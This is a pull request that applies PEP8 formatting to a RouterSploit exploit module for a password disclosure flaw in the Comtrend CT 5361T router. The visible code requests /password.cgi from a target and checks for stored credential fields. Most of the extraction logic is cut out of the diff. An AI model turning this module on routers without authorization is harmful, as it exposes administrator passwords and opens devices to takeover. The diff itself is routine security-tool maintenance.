### PR TITLE
PEP8tify code to match the project code style

### DIFF
--- a/routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
+++ b/routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
@@ -1,8 +1,15 @@
 from base64 import b64decode
-import requests
 import re
+import requests
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_status,
+    print_error,
+    print_success,
+    print_table,
+ )
 
 
 class Exploit(exploits.Exploit):
@@ -14,20 +21,20 @@ class Exploit(exploits.Exploit):
         'name': 'Comtrend CT 5361T Password Disclosure',
         'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability',
         'authors': [
-            'TUNISIAN CYBER', # routersploit module,
+            'TUNISIAN CYBER',  # routersploit module,
          ],
         'references': [
             'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html'
          ],
         'targets': [
-            'Comtrend CT 5361T (more likely CT 536X)\n' + 
-            'Software Version: A111-312SSG-T02_R01\n' + 
+            'Comtrend CT 5361T (more likely CT 536X)\n' +
+            'Software Version: A111-312SSG-T02_R01\n' +
             'Wireless Driver Version: 4.150.10.15.cpe2.2'
          ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
         url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
@@ -64,7 +71,6 @@ class Exploit(exploits.Exploit):
         else:
             print_error("Credentials could not be found")
 
-
     def check(self):
         url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
 
@@ -72,10 +78,9 @@ class Exploit(exploits.Exploit):
             r = requests.get(url)
             res = r.text
         except:
-            return None # could not be verified
+            return None  # could not be verified
 
         if any(map(lambda x: x in res, ["pwdSupport", "pwdUser", "pwdAdmin"])):
-            return True   # target vulnerable
-        
-        return False  # target not vulnerable
+            return True  # target vulnerable
 
+        return False  # target not vulnerable


### PR DESCRIPTION
some adjustments to keep up with @llazzaro changes.
however, i ignored PEP8 E501 (lines should be <79), since this is more readable, not to mention that limiting a line to 79 chars makes no sense.